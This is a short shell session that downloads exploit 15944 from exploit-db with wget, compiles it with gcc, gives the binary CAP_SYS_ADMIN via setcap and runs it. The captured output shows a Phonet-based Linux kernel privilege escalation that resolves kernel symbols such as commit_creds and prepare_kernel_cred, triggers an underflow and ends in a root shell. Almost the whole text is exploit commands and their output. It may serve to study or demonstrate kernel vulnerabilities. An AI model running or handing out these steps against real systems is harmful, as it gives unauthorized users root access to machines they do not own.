$ wget http://www.exploit-db.com/download/15944 $ mv 15944 15944.c $ gcc 15944.c -o exe # ignore warnings(if any) $ # For more info search CAP_SYS_ADMIN in /usr/include/linux/capability.h $ # Unfortunately, we need root privileges here $ sudo setcap cap_sys_admin+ep ./exe $ whoami <your username (different from root)> $ ./exe [*] Testing Phonet support and CAP_SYS_ADMIN... [*] Resolving kernel symbols... [+] Resolved proto_tab to 0xffffffffa019e290 [+] Resolved local_port_range to 0xffffffffa019e1a0 [+] Resolved pn_proto to 0xffffffffa019dfa0 [+] Resolved commit_creds to 0xffffffff81086890 [+] Resolved prepare_kernel_cred to 0xffffffff81086d60 [*] Preparing fake structures... [*] Copying Structures. [*] Underflowing with offset -30 [*] Elevating privlidges... [*] This was a triumph... I'm making a note here, huge success. # whoami #Checking if we success. root #